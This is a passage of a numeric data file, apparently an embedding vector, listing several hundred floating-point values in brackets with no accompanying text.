[ -0.00499340845271945, 0.022116923704743385, -0.007391308434307575, -0.001570415566675365, 0.013118147850036621, -0.000528697099070996, -0.02228412963449955, 0.031024495139718056, -0.029838845133781433, 0.02088567242026329, -0.017267921939492226, 0.014965024776756763, 0.008542756550014019, 0.03137411177158356, 0.008155140094459057, -0.017799943685531616, -0.006475470494478941, -0.021767308935523033, -0.021584901958703995, -0.025901881977915764, 0.013505764305591583, -0.02827318012714386, -0.02520265243947506, 0.006448869127780199, -0.011377675458788872, 0.015238636173307896, -0.012016101740300655, -0.009637202136218548, -0.007547114975750446, 0.009295187890529633, 0.02467063069343567, 0.016386283561587334, -0.012403718195855618, -0.007433110382407904, -0.004677995108067989, 0.00631966395303607, 0.04867243394255638, 0.05840083956718445, 0.009515597485005856, 0.01478261686861515, -0.02502024546265602, -0.058005623519420624, -0.03748476505279541, 0.018635978922247887, 0.002019784413278103, 0.020080039277672768, 0.028060371056199074, 0.015018227510154247, -0.02786276303231716, 0.0010972957825288177, 0.004913605283945799, -0.020551258698105812, -0.039400044828653336, -0.0737534761428833, 0.01913759857416153, -0.0016008168458938599, 0.015459045767784119, 0.025035444647073746, 0.0030705281533300877, 0.011590483598411083, -0.012943340465426445, 0.019046396017074585, 0.025415461510419846, 0.021934516727924347, -0.010465636849403381, 0.009606800973415375, -0.02281615324318409, 0.020794468000531197, -0.022861754521727562, 0.03873121738433838, -0.01913759857416153, -0.017632735893130302, 0.018286364153027534, 0.056759171187877655, -0.0028102174401283264, -0.03444463759660721, 0.05207737535238266, 0.035873498767614365, -0.029124416410923004, 0.05575592815876007, -0.03517426922917366, 0.025309056043624878, -0.019958432763814926, 0.032316550612449646, 0.013999784365296364, 0.022466538473963737, -0.056911177933216095, -0.06688278913497925, -0.001685370341874659, -0.02096167579293251, -0.004362582229077816, 0.03453584387898445, 0.01789114624261856, -0.023925799876451492, 0.016082271933555603, 0.01332335639744997, -0.028440387919545174, -0.03289417177438736, -0.06095454469323158, -0.007759924046695232, -0.03696794435381889, -0.020748866721987724, -0.006437468808144331, 0.016735898330807686, 0.013102946802973747, -0.009804408997297287, 0.012107305228710175, -0.04517628625035286, 0.012798934243619442, 0.1029386967420578, 0.038913626223802567, -0.002321896841749549, -0.01502582710236311, 0.011111663654446602, -0.013726172968745232, 0.017176717519760132, 0.0036861540284007788, -0.035721492022275925, -0.03596470132470131, -0.009956415742635727, -0.010169224813580513, -0.026585910469293594, -0.02834918349981308, -0.021204885095357895, -0.0109520573168993, 0.03733275830745697, -0.0036139509174972773, -0.014752215705811977, -0.023773793131113052, -0.013315755873918533, -0.021584901958703995, -0.018407968804240227, -0.006099254824221134, -0.005757240578532219, 0.007919530384242535, -0.006893487647175789, 0.009431993588805199, 0.05557351931929588, -0.004408183973282576, -0.0070340936072170734, -0.06049852445721626, -0.024533824995160103, 0.04316980391740799, -0.011073661968111992, -0.0322861485183239, -0.036086305975914, 0.00034628945286385715, 0.04441625624895096, -0.01966962218284607, 0.0030686280224472284, 0.003439143532887101, -0.04806440696120262, 0.020764067769050598, 0.027999568730592728, 0.023165768012404442, -0.011286471039056778, -0.0032548359595239162, 0.03976485878229141, 0.006163857411593199, 0.005939648021012545, -0.04240977019071579, -0.029215620830655098, 0.043230604380369186, -0.02096167579293251, -0.01485862024128437, -0.029990851879119873, 0.020627262070775032, 0.022223327308893204, -0.018179958686232567, 0.022496938705444336, 0.008231143467128277, 0.026616310700774193, 0.003910363186150789, 0.0016597192734479904, -0.059981703758239746, -0.021326489746570587, 0.018696781247854233, 0.03544788062572479, -0.021584901958703995, -0.02198011800646782, 0.0005073212087154388, 0.03207333758473396, 0.031070098280906677, -0.003395441686734557, 0.007828326895833015, -0.02758915163576603, 0.0330461785197258, -0.03210373967885971, 0.034931059926748276, -0.019624019041657448, 0.0009614401496946812, 0.011833693832159042, 0.017799943685531616, -0.010868453420698643, 0.033806212246418, 0.0020539858378469944, -0.029124416410923004, 0.01106606237590313, -0.014995425939559937, -0.0008179841679520905, 0.018210360780358315, -0.02951963245868683, -0.012760932557284832, 0.017784742638468742, -0.03070528246462345, 0.0033973418176174164, -0.019578417763113976, 0.04031208157539368, 0.010648044757544994, -0.0025062046479433775, -0.00716329924762249, 0.0025860080495476723, 0.021858513355255127, 0.019776025786995888, 0.011666486971080303, 0.005415226332843304, -0.03997766971588135, -0.00010177300282521173, -0.007360907271504402, -0.02164570428431034, 0.02588668093085289, -0.015367841348052025, 0.03167812153697014, 0.001559015130624175, -0.005255619529634714, -0.005544431507587433, -0.018635978922247887, 0.01913759857416153, 0.0007500562933273613, -0.007957532070577145, 0.04867243394255638, -0.014759816229343414, -0.02118968404829502, 0.005350623279809952, 0.01728312112390995, -0.009660003706812859, -0.0037203554529696703, -0.008253945037722588, -0.00820834282785654, -0.007129097823053598, -0.003948364872485399, 0.03398862108588219, -0.01944161206483841, -0.02137209288775921, 0.019836828112602234, 0.055695123970508575, -0.00949279684573412, 0.0017233719117939472, -0.015421044081449509, 0.02398660220205784, 0.04313940182328224, -0.013817377388477325, 0.02763475477695465, -0.002956523559987545, -0.01178809255361557, 0.011134465225040913, 0.036511924117803574, 0.025445861741900444, -0.026464305818080902, -0.03973446041345596, -0.00707969581708312, 0.0023579983972012997, -0.010344032198190689, 0.0023560982663184404, -0.00809433776885271, -0.012882538139820099, -0.015489446930587292, 0.008276745676994324, -0.037575967609882355, -0.01184129435569048, 0.02179771102964878, 0.00021126506908331066, 0.008550357073545456, -0.02391059882938862, -0.03645112365484238, -0.010974857956171036, 0.007288704160600901, -0.0030819287057965994, -0.02167610451579094, -0.030446872115135193, -0.014151791110634804, 0.008884770795702934, -0.019152799621224403, 0.02474663406610489, 0.025856278836727142, -0.009903213940560818, 0.013080146163702011, -0.0007505313260480762, -0.021083280444145203, -0.007053094450384378, 0.020596859976649284, 0.009044378064572811, -0.036207910627126694, 0.012882538139820099, -0.010754449293017387, 0.01243411935865879, 0.003518946934491396, 0.010442836210131645, -0.01948721334338188, 0.005221418105065823, -0.035113465040922165, -0.006714880466461182, -0.01501062698662281, -0.005213817581534386, -0.03727195784449577, 0.032468557357788086, -0.03377581015229225, 0.014166991226375103, -0.001602716976776719, -0.01011602208018303, 0.04438585415482521, -0.0476691909134388, -0.007155698724091053, -0.005780041217803955, -0.010184424929320812, 0.008877170272171497, 0.005472228396683931, -0.030538074672222137, -0.009409192949533463, 0.03733275830745697, -0.021128881722688675, 0.03274216875433922, -0.04578431323170662, 0.01517783384770155, 0.013368958607316017, 0.002186991274356842, -0.004180174320936203, 0.03821439668536186, -0.03134370967745781, 0.022937757894396782, -0.012038902379572392, 0.002365598687902093, 0.008329947479069233, 0.007744723465293646, 0.006714880466461182, -0.052898209542036057, -0.018544774502515793, 0.0016293179942294955, 0.02073366567492485, -0.009698005393147469, -0.016903106123209, -0.01769353821873665, -0.009842410683631897, -0.01814955845475197, 0.01644708588719368, 0.011142064817249775, 0.002608808921650052, -0.005818042904138565, 0.008930373005568981, 0.010085620917379856, 0.0009832910727709532, 0.012456919997930527, 0.04283538833260536, 0.017237519845366478, 0.006897287908941507, -0.016173474490642548, -0.0214936975389719, 0.0026373101864010096, 0.023636987432837486, 0.006034651771187782, 0.0018402268178761005, 0.005259419791400433, 0.014881421811878681, 0.01167408749461174, 0.043869033455848694, 0.01271533127874136, -0.02766515500843525, -0.0009025376639328897, -0.006030851975083351, -0.003963565453886986, 0.019654421135783195, 0.03192133456468582, -0.020596859976649284, 0.01583906076848507, 0.0028843204490840435, -0.017267921939492226, 0.030218861997127533, 0.03860961273312569, -0.01171208918094635, 0.0043853833340108395, -0.016310280188918114, 0.007904330268502235, 0.04438585415482521, -0.05900886282324791, -0.02403220348060131, 0.015747858211398125, -0.022527340799570084, 0.0552695095539093, -0.004814801272004843, -0.012517722323536873, -0.0552695095539093, 0.050648514181375504, -0.02720913663506508, -0.05499589815735817, -0.021584901958703995, 0.06511951982975006, -0.020946474745869637, -0.014501405879855156, -0.002175590954720974, -0.07460471242666245, 0.017784742638468742, -0.03131330758333206, 0.03502226248383522, -0.007467311806976795, -0.0027608152013272047, 0.062140196561813354, 0.016021469607949257, -0.03581269457936287, 0.019228802993893623, 0.005225218366831541, 0.03593429923057556, -0.005776241421699524, -0.022709747776389122, 0.0022173926699906588, 0.02824277989566326, 0.03903523087501526, 0.0011818493949249387, 0.024427419528365135, 0.025445861741900444, 0.03873121738433838, 0.002852019155398011, 0.002337097655981779, 0.004982008133083582, 0.010534039698541164, 0.03176932781934738, -0.006608475930988789, 0.020034436136484146, 0.016629494726657867, 0.0019095797324553132, -0.05043570697307587, -0.020399251952767372, 0.020460054278373718, 0.013042144477367401, 0.0035417478065937757, 0.004218176007270813, -0.0522901825606823, -0.03316778317093849, -0.04867243394255638, -0.011658886447548866, -0.025248253718018532, -0.02675311639904976, 0.022116923704743385, -0.02126568742096424, 0.0164926890283823, 0.012669729068875313, -0.04733477532863617, -0.008816367946565151, -0.01910719834268093, 0.005673636682331562, -0.02603868767619133, 0.0031313307117670774, 0.015747858211398125, -0.010663244873285294, -0.004077570047229528, -0.0013766074553132057, -0.006874487269669771, 0.0021774908527731895, 0.0019219302339479327, 0.03319818526506424, -0.004050969146192074, -0.02698112651705742, 0.010625244118273258, 0.008763166144490242, 0.0094167934730649, 0.011605684645473957, 0.016811901703476906, -0.01493462361395359, -0.03262056037783623, 0.0016682696295902133, -0.010427635163068771, 0.00978160835802555, 0.003294737543910742, 0.001559015130624175, 0.001504862797446549, -0.017632735893130302, 0.03672473505139351, -0.00503901019692421, -0.04210575670003891, 0.006030851975083351, -0.052776604890823364, -0.01260132621973753, -0.009941214695572853, -0.04043368995189667, 0.006961890496313572, 0.0049402061849832535, -0.006771882995963097, -0.0024891039356589317, 0.012000900693237782, 0.003741256194189191, 0.006262661423534155, 0.0065780747681856155, 0.010534039698541164, 0.0199736338108778, -0.008155140094459057, 0.00817034114152193, 0.007402709219604731, -0.02187371253967285, -0.02418421022593975, 0.020216844975948334, 0.029580434784293175, 0.017039911821484566, -0.025673871859908104, 0.062930628657341, -0.013384158723056316, 0.024853037670254707, -0.05198616907000542, -0.031434912234544754, 0.02758915163576603, -0.013011743314564228, -0.009067178703844547, 0.00173192226793617, -0.0675516203045845, -0.00033037629327736795, -0.03292457386851311, -0.032164543867111206, -0.02578027732670307, -0.011233269236981869, 0.0011029960587620735, -0.005863644648343325, -0.009545998647809029, -0.022983359172940254, -0.019578417763113976, -0.023895397782325745, 0.013847778551280499, -0.02114408276975155, 0.03857921063899994, 0.036359917372465134, 0.017632735893130302, 0.055695123970508575, -0.017328724265098572, 0.0057724411599338055, -0.012654528021812439, -0.012494921684265137, 0.017389526590704918, -0.015003026463091373, -0.005206217523664236, 0.01626467891037464, 0.029200419783592224, -0.038792021572589874, 0.015132231637835503, -0.002230693120509386, 0.04320020228624344, -0.001970382174476981, 0.01743512786924839, -0.034931059926748276, 0.028303582221269608, 0.02626669593155384, 0.012023702263832092, 0.018970392644405365, -0.0034049421083182096, -0.0012920539593324065, -0.0028767201583832502, -0.015094229951500893, 0.014539407566189766, 0.006517271976917982, 0.020688064396381378, -0.02702672779560089, 0.031890932470560074, -0.015626251697540283, 0.02505064569413662, -0.03535667806863785, 0.020080039277672768, 0.01675109937787056, -0.013391759246587753, 0.004890804179012775, -0.0024150009267032146, 0.032468557357788086, 0.010055219754576683, -0.03611670807003975, -0.003933164291083813, 0.011605684645473957, -0.014668612740933895, 0.02372818998992443, -0.021326489746570587, -0.006008050870150328, 0.00945479515939951, 0.013832577504217625, 0.006935289595276117, -0.03702874481678009, -0.050466109067201614, 0.026433903723955154, -0.02888120524585247, 0.002428301377221942, 0.02106807939708233, 0.02334817498922348, 0.00026577358948998153, -0.0003826284664683044, -0.016006268560886383, -0.020536057651042938, -0.029382826760411263, 0.01385537814348936, -0.004495587665587664, -0.02398660220205784, -0.01966962218284607, -0.00135950674302876, -0.003370740683749318, 0.001964682014659047, -0.008504754863679409, 0.02562827058136463, 0.0219041146337986, 0.006144856568425894, 0.03289417177438736, 0.022071322426199913, -0.03020366095006466, -0.03578229248523712, 0.022618545219302177, 0.01966962218284607, -0.0011884996201843023, -0.020323248580098152, 0.016903106123209, 0.01364257000386715, 0.004024368245154619, 0.05314141884446144, 0.001279703457839787, 0.002844418864697218, 0.008307146839797497, 0.03584309667348862, 0.024685829877853394, -0.005358223803341389, 0.01015402376651764, 0.009842410683631897, -0.0476691909134388, 0.012996542267501354, -0.022466538473963737, -0.005563432350754738, 0.019335206598043442, 0.0072659035213291645, -0.0063272640109062195, 0.00033417646773159504, -0.03081168606877327, -0.024427419528365135, 0.01263932790607214, 0.02175210788846016, -0.020520856603980064, -0.02248173952102661, 0.029398027807474136, 0.03347179666161537, -0.0056394352577626705, 0.01819515973329544, -0.021022478118538857, -0.011719689704477787, -0.010518839582800865, -0.023560984060168266, -0.0025043045170605183, -0.02175210788846016, 0.00027646153466776013, -0.028409985825419426, -0.002299095969647169, 0.00043060549069195986, 0.0013462061760947108, -0.027953967452049255, 0.014873821288347244, -0.005023809615522623, 0.01224411092698574, 0.023393776267766953, -0.012259311974048615, 0.027908366173505783, 0.043230604380369186, 0.02448822185397148, -0.02042965218424797, -0.009424393065273762, -0.007440710905939341, -0.016203876584768295, -0.00047644489677622914, 0.02240573614835739, 0.012684930115938187, -0.0453282929956913, 0.013057345524430275, 0.017647936940193176, 0.0025613070465624332, 0.013536165468394756, -0.022162524983286858, 0.0022610945161432028, 0.01895519159734249, -0.034049421548843384, -0.0072165015153586864, -0.015869462862610817, 0.011157265864312649, -0.030826887115836143, 0.0001050981372827664, 0.010131223127245903, -0.043838631361722946, -0.0018763283733278513, 0.0064336685463786125, 0.0020349849946796894, 0.0042599779553711414, 0.019320007413625717, 0.005058011040091515, -0.018939990550279617, -0.06657878309488297, 0.03081168606877327, -0.006536272820085287, 0.05636395514011383, 0.005339222960174084, -0.0015286138514056802, -0.024017002433538437, 0.020520856603980064, 0.007775124628096819, -0.020566457882523537, -0.012593725696206093, -0.025217853486537933, 0.016842303797602654, 0.010883654467761517, -0.008307146839797497, -0.014554607681930065, 0.035265471786260605, 0.0008132339571602643, 0.012624126859009266, 0.03062927909195423, 0.0015191134298220277, -0.021432895213365555, 0.015641452744603157, -0.03453584387898445, 0.016173474490642548, -0.012008501216769218, -0.022010518237948418, -0.002768415492027998, -0.025217853486537933, 0.002893820870667696, -0.021843312308192253, -0.004324580542743206, -0.041406527161598206, -0.018635978922247887, -0.04006887227296829, -0.0065286727622151375, 0.005270820111036301, -0.006156256888061762, 0.020612061023712158, 0.0023579983972012997, 0.000961915182415396, -0.036086305975914, -0.00978160835802555, 0.006661678198724985, 0.015930265188217163, -0.02664671279489994, 0.013551365584135056, -0.01868158020079136, -0.00707969581708312, 0.008633960969746113, 0.01895519159734249, 0.006072653457522392, 0.003921763971447945, -0.019228802993893623, -0.025491464883089066, 0.014676213264465332, -0.003258635988458991, -0.011430877260863781, 0.023636987432837486, -0.0021945915650576353, 0.011225668713450432, 0.002652510767802596, -0.012578525580465794, 0.008595959283411503, -0.047395579516887665, -0.008466753177344799, 0.015702255070209503, 0.03179972618818283, -0.014851019717752934, 0.010055219754576683, 0.02099207602441311, -0.013961782678961754, 0.005468428134918213, 0.008732764981687069, 0.03210373967885971, 0.02114408276975155, -0.022299330681562424, 0.029838845133781433, -0.03520467132329941, 0.015747858211398125, 0.004601992201060057, -0.0021793909836560488, -0.025369860231876373, -0.02365218847990036, -0.01766313798725605, 0.053202223032712936, -0.0021983918268233538, 0.0027114131953567266, 0.013900980353355408, 0.023864995688199997, 0.017039911821484566, 0.002751314779743552, 0.012464520521461964, -0.04320020228624344, -0.0027418145909905434, 0.03179972618818283, -0.01614307425916195, 0.017556732520461082, -0.003537947777658701, -0.013353757560253143, -0.006669278256595135, -0.003866661572828889, -0.01697910949587822, 0.03411022573709488, -0.006768082734197378, -0.004282779060304165, -0.04429464787244797, 0.01364257000386715, -0.007262103259563446, -0.032042939215898514, -0.01393138151615858, 0.002027384703978896, 0.028485989198088646, -0.0019494814332574606, -0.01393138151615858, -0.013201750814914703, -0.006885887589305639, 0.017070312052965164, 0.03857921063899994, -0.034171026200056076, 0.016781501471996307, 0.007440710905939341, -0.027604352682828903, 0.011970499530434608, 0.0036006502341479063, 0.025035444647073746, -0.004974407609552145, 0.004753998480737209, -0.0003774032520595938, 0.007592717185616493, 0.0011010959278792143, -0.02248173952102661, 0.023743391036987305, 0.01252532284706831, -0.02979324385523796, 0.013346157036721706, 0.00930278841406107, 0.032650962471961975, 0.0035721492022275925, 0.0014022585237398744, 0.033745408058166504, -0.014577408321201801, 0.001756623387336731, 0.018179958686232567, 0.027528349310159683, -0.008063936606049538, 0.04605792462825775, 0.011377675458788872, -0.0005457978113554418, -0.015352641232311726, 0.042774587869644165, -0.031100498512387276, -0.006141056306660175, -0.0253546591848135, -0.01720711775124073, -0.0055900332517921925, -0.04149773344397545, -0.011081262491643429, -0.006935289595276117, -0.0016958208288997412, 0.0014535606605932117, 0.0028292180504649878, 0.0058104428462684155, 0.009272387251257896, 0.027148334309458733, 0.0249746423214674, -0.006217059679329395, -0.009766408242285252, -0.024761833250522614, 0.004210575949400663, -0.01417459174990654, 0.04213615879416466, 0.018362367525696754, 0.0044537861831486225, -0.01580866053700447, 0.01013882365077734, -0.008778366260230541, 0.0029774243012070656, -0.03096369281411171, -0.006190458312630653, -0.027984367683529854, 0.002337097655981779, -0.02187371253967285, 0.012137706391513348, 0.005977649707347155, -0.011544882319867611, 0.013946582563221455, -0.010313631035387516, 0.005415226332843304, 0.00016340681759174913, 0.010792450979351997, 0.0036044504959136248, -0.0004982958198525012, -0.00374315632507205, 0.012114905752241611, 0.045419495552778244, -0.025643471628427505, -0.0006061253370717168, -0.008200742304325104, -0.04499387741088867, -0.008086737245321274, 0.017267921939492226, 0.021858513355255127, -0.03973446041345596, 0.0012132006231695414, 0.01336135808378458, 0.021083280444145203, -0.010085620917379856, -0.048034004867076874, -0.012707730755209923, -0.03958245366811752, -0.006825084798038006, -0.016401484608650208, -0.01364257000386715, 0.007600317243486643, -0.02486823871731758, -0.009431993588805199, 0.014645811170339584, 0.0031123298685997725, -0.011962899938225746, 0.007277303840965033, 0.018179958686232567, -0.00209388742223382, -0.009614401496946812, -0.04022087901830673, -0.016082271933555603, 0.015899863094091415, -0.02106807939708233, -0.0032396353781223297, -0.023469779640436172, 0.0460883229970932, -0.02141769416630268, 0.005723039153963327, 0.0013310055946931243, 0.029382826760411263, 0.015223436057567596, -0.02213212475180626, -0.0029299224261194468, 0.0022097923792898655, 0.008884770795702934, 0.006133456248790026, -0.006084054242819548, -0.013270153664052486, -0.002967923879623413, 0.013916181400418282, 0.006369065959006548, -0.017115915194153786, -0.009956415742635727, 0.01501062698662281, -0.012130106799304485, -0.012456919997930527, -0.00061372562777251, 0.011689288541674614, -0.005730639211833477, -0.009371191263198853, -0.015337440185248852, 0.022192927077412605, 0.012000900693237782, -0.023849796503782272, -0.011947698891162872, 0.007201300468295813, -0.007535714656114578, -0.022861754521727562, -0.012373317033052444, -0.025521865114569664, -0.01948721334338188, 0.04177134484052658, -0.03207333758473396, 0.0006289262673817575, -0.016477487981319427, 0.0017034211196005344, 0.004700796213001013, 0.023697789758443832, 0.00616005714982748, -0.017328724265098572, 0.01339935977011919, -0.002852019155398011, -0.06238340586423874, 0.019836828112602234, -0.020764067769050598, -0.005289820954203606, -0.013824976980686188, -0.013026944361627102, 0.010701246559619904, 0.04149773344397545, 0.016781501471996307, 0.013186550699174404, 0.0002344222884858027, -0.017100714147090912, -0.005932047497481108, -0.0017803743248805404, -0.013536165468394756, 0.0013006043154746294, 0.036025505512952805, -0.03005165420472622, 0.0017993751680478454, -0.026008285582065582, 0.013961782678961754, 0.04429464787244797, -0.022344933822751045, 0.009538398124277592, 0.034627046436071396, 0.0016521189827471972, 0.02502024546265602, -0.02312016487121582, 0.0035797494929283857, -0.017951950430870056, -0.024655429646372795, -0.03268136456608772, -0.02720913663506508, -0.0234545785933733, -0.014090988785028458, -0.03897442668676376, -0.0006802284042350948, -0.03137411177158356, 0.014356999658048153, 0.018970392644405365, 0.025217853486537933, 0.00007125297270249575, -0.03596470132470131, 0.015778258442878723, -0.008193141780793667, -0.003661452792584896, 0.016097472980618477, -0.00023620361753273755, 0.011978100053966045, 0.013178950175642967, -0.0007396058645099401, -0.0008488604216836393, 0.033745408058166504, 0.044629063457250595, -0.03164772316813469, 0.007155698724091053, 0.003028726438060403, -0.005289820954203606, 0.009317989461123943, 0.01807355508208275, 0.0021242888178676367, 0.000020188343114568852, 0.033563002943992615, 0.024397019296884537, 0.008124738931655884, 0.02213212475180626, 0.024169009178876877, 0.0031826328486204147, -0.002918521873652935, -0.03943044692277908, 0.029610836878418922, -0.028972409665584564, -0.0368463397026062, -0.0016673195641487837, 0.022800952196121216, -0.019304806366562843, -0.038913626223802567, -0.002671511610969901, 0.006589475087821484, -0.0009049127693288028, 0.0124721210449934, -0.0012065503979101777, 0.005662236362695694, 0.004655194468796253, 0.013156149536371231, 0.005149214994162321, 0.04259217903017998, 0.0234545785933733, -0.0016483188373968005, -0.010268028825521469, 0.008968374691903591, -0.009614401496946812, 0.02080966904759407, 0.011157265864312649, -0.020642461255192757, -0.02030804753303528, 0.018544774502515793, -0.038792021572589874, -0.002627809764817357, -0.013201750814914703, 0.01267732959240675, 0.015056228265166283, 0.010936856269836426, 0.02444262057542801, 0.018012752756476402, 0.0009039627620950341, -0.0064146677032113075, -0.018666379153728485, 0.026099490001797676, -0.037879981100559235, 0.002510004909709096, 0.008185542188584805, -0.0007210801122710109, -0.017237519845366478, -0.016173474490642548, -0.016538290306925774, -0.015307039022445679, 0.005088412668555975, -0.03050767444074154, -0.016659894958138466, 0.011134465225040913, -0.03365420550107956, 0.009485196322202682, -0.009796809405088425, -0.021098481491208076, -0.00898357480764389, -0.004035768564790487, -0.025141850113868713, -0.0330461785197258, -0.0029755241703242064, 0.029078815132379532, 0.08682602643966675, 0.0025575067847967148, -0.008436352014541626, -0.004172574263066053, -0.014410201460123062, 0.013665370643138885, -0.00346384453587234, 0.0024891039356589317, -0.0011827993439510465, 0.032498955726623535, 0.007174699567258358, -0.0017756241140887141, 0.01013882365077734, -0.002378899371251464, -0.005939648021012545, 0.019532816484570503, 0.013802176341414452, 0.006456469651311636, 0.006410867907106876, 0.004088970832526684, 0.00503901019692421, -0.004206775687634945, 0.02205612137913704, -0.011210467666387558, 0.017799943685531616, -0.014448203146457672, -0.02667711302638054, -0.006992292124778032, -0.024321015924215317, -0.005301221273839474, -0.004719797056168318, 0.005578632932156324, -0.0025062046479433775, -0.001602716976776719, 0.0002401225210633129, -0.006110655143857002, 0.022861754521727562, -0.019624019041657448, -0.0038020587526261806, -0.02812117338180542, -0.0007723822491243482, -0.02103767916560173, -0.02129608951508999, 0.006874487269669771, -0.00620565889403224, -0.037423960864543915, 0.020672863349318504, -0.009325589053332806, 0.006612276192754507, 0.013429760932922363, -0.006156256888061762, -0.026965925469994545, -0.00047359478776343167, 0.031161300837993622, -0.005970049183815718, 0.017830343917012215, 0.020338449627161026, 0.014128989540040493, -0.001595116569660604, -0.016933506354689598, -0.005305021535605192, 0.006171457469463348, 0.018255962058901787, -0.007417909801006317, -0.0032567360904067755, -0.01413659006357193, -0.01986723020672798, -0.0004593441844917834, -0.013695771805942059, 0.007763724308460951, 0.005175815895199776, 0.008915171958506107, 0.01252532284706831, -0.0027228137478232384, 0.008991175331175327, 0.03012765757739544, -0.016279879957437515, 0.0077903252094984055, -0.029322024434804916, -0.020064838230609894, 0.02778675965964794, 0.019624019041657448, -0.013627368956804276, 0.013612168841063976, -0.005856044590473175, 0.03012765757739544, -0.002582207787781954, 0.01880318485200405, -0.019350407645106316, 0.0051036132499575615, -0.012624126859009266, 0.0028900206089019775, 0.018392767757177353, 0.004818601068109274, 0.014851019717752934, 0.021554499864578247, 0.0007035043672658503, -0.016538290306925774, -0.0009718905785121024, -0.0049896081909537315, -0.009979216381907463, 0.008998775854706764, 0.036086305975914, -0.01508663035929203, 0.014303796924650669, 0.012570925056934357, -0.003902762895449996, 0.015109430998563766, -0.004864203277975321, -0.010921656154096127, -0.019852029159665108, -0.02088567242026329, 0.015231035649776459, -0.03702874481678009, 0.011772891506552696, -0.012776133604347706, 0.0072165015153586864, -0.02486823871731758, -0.014037786051630974, -0.031252503395080566, -0.01769353821873665, -0.006897287908941507, 0.023636987432837486, -0.009545998647809029, -0.017070312052965164, -0.006695879623293877, -0.01333855651319027, -0.022086521610617638, 0.0398864671587944, 0.02248173952102661, 0.011643686331808567, -0.00915078166872263, 0.015869462862610817, -0.008466753177344799, 0.028546791523694992, -0.01110406406223774, 0.048003602772951126, -0.014106188900768757, 0.011180066503584385, -0.01493462361395359, -0.022557741031050682, 0.04006887227296829, 0.026996327564120293, 0.004305579699575901, 0.005278420634567738, -0.0049858083948493, 0.013809776864945889, 0.008162740617990494, 0.02936762571334839, 0.010762049816548824, -0.02827318012714386, -0.04329140856862068, 0.007904330268502235, 0.021478496491909027, 0.0008341348147951066, 0.017830343917012215, 0.00924958661198616, -0.026601111516356468, -0.05043570697307587, 0.019320007413625717, 0.006817484740167856, 0.006251261103898287, 0.020034436136484146, -0.0057268389500677586, 0.005700238049030304, 0.02520265243947506, 0.0064032673835754395, -0.01588466390967369, -0.018514372408390045, -0.02672271616756916, -0.018088756129145622, 0.011225668713450432, -0.0018649278208613396, -0.015869462862610817, 0.01948721334338188, 0.02558266744017601, -0.017389526590704918, -0.018210360780358315, 0.0036348518915474415, -0.008915171958506107, -0.005126413889229298, -0.0023066962603479624, -0.00926478672772646, -0.02353058196604252, 0.011164866387844086, -0.016811901703476906, 0.002985024591907859, 0.014995425939559937, -0.018666379153728485, 0.02213212475180626, 0.012251711450517178, 0.03255975991487503, -0.010085620917379856, -0.016279879957437515, -0.004685595631599426, -0.018711980432271957, 0.013938982039690018, -0.015793459489941597, 0.001458310871385038, -0.014395001344382763, -0.0029736242722719908, 0.006080253981053829, -0.00620565889403224, -0.020748866721987724, 0.0030895289964973927, -0.011354873888194561, -0.01959361881017685, -0.004582991357892752, -0.008253945037722588, -0.004195375367999077, -0.018939990550279617, -0.000745306140743196, 0.020900873467326164, -0.005624234676361084, 0.020900873467326164, 0.003332739230245352, 0.017723940312862396, -0.02380419336259365, -0.027528349310159683, 0.011643686331808567, 0.0017243219772353768, 0.028075572103261948, -0.012692529708147049, -0.005738239735364914, -0.013513363897800446, 0.006057452876120806, 0.0245642252266407, -0.02398660220205784, -0.02717873454093933, 0.007980333641171455, -0.03024926222860813, -0.0016758699202910066, 0.027543550357222557, 0.008991175331175327, -0.010602442547678947, -0.03593429923057556, 0.012950940988957882, -0.010009617544710636, 0.012844536453485489, -0.029154816642403603, 0.006144856568425894, -0.017647936940193176, -0.010769649408757687, 0.010982458479702473, -0.011256069876253605, -0.00030330015579238534, -0.002631609793752432, 0.010442836210131645, -0.0007429310353472829, 0.032346948981285095, -0.0099868169054389, -0.003967365715652704, -0.006266461685299873, 0.019076796248555183, -0.0049022044986486435, 0.014995425939559937, 0.01007802039384842, -0.017906347289681435, 0.002787416335195303, 0.0051910169422626495, 0.006741481367498636, -0.026509907096624374, 0.014052987098693848, 0.0022325932513922453, -0.012798934243619442, 0.03791038319468498, -0.028531590476632118, -0.020612061023712158, 0.010815251618623734, 0.008861970156431198, 0.0018003251170739532, -0.004195375367999077, -0.0071975006721913815, -0.017298322170972824, 0.02080966904759407, -0.009044378064572811, 0.012426518835127354, -0.018331965431571007, -0.027345942333340645, 0.00003874380490742624, -0.005780041217803955, 0.040008071810007095, 0.027543550357222557, -0.028151575475931168, 0.01067084539681673, -0.0009391141938976943, -0.026783518493175507, 0.004423384554684162, -0.021508898586034775, -0.003724155481904745, -0.008717563934624195, 0.008535156026482582, -0.0002888120652642101, -0.031222103163599968, 0.01789114624261856, -0.0005220468156039715, -0.027391543611884117, 0.025643471628427505, -0.01256332453340292, 0.012852136977016926, 0.011400476098060608, 0.015421044081449509, 0.02614509128034115, -0.013802176341414452, 0.009257186204195023, 0.007756123784929514, -0.021584901958703995, -0.006608475930988789, -0.004297979641705751, -0.005339222960174084, 0.01332335639744997, 0.006600875407457352, -0.01890959031879902, -0.05834003537893295, -0.007702921517193317, 0.016279879957437515, 0.0032434354070574045, -0.015930265188217163, -0.011423276737332344, -0.011073661968111992, 0.014927023090422153, -0.008314747363328934, -0.015147432684898376, -0.0007462561479769647, -0.00826154462993145, -0.0012075004633516073, -0.010290829464793205, 0.0035322473850101233, -0.007018893025815487, -0.016507890075445175, 0.014706614427268505, 0.00418777484446764, 0.01517783384770155, -0.010556841269135475, -0.019091997295618057, 0.0012702030362561345, -0.009439594112336636, -0.0009020626894198358, 0.0019722823053598404, -0.006456469651311636, -0.03715034946799278, 0.033806212246418, -0.002578407758846879, 0.009165982715785503, 0.03599510341882706, -0.013543765991926193, 0.012760932557284832, 0.002622109604999423, 0.007360907271504402, -0.01761753484606743, -0.02682911977171898, -0.021615302190184593, -0.012722930870950222, 0.007566115818917751, 0.0184231698513031, 0.005825643427670002, 0.011035661213099957, 0.007778924889862537, -0.0065590739250183105, -0.03237735107541084, -0.02080966904759407, -0.011309272609651089, 0.015367841348052025, -0.015147432684898376, -0.008215943351387978, -0.003990166820585728, -0.024077804759144783, 0.003471445059403777, 0.006581875029951334, -0.02520265243947506, -0.018635978922247887, 0.002916621742770076, 0.0022572942543774843, -0.005533031187951565, 0.003629151498898864, -0.0002378661883994937, 0.03873121738433838, -0.015793459489941597, -0.024169009178876877, 0.036815937608480453, 0.008763166144490242, -0.0005035210051573813, -0.004020567983388901, 0.01271533127874136, -0.004658994730561972, 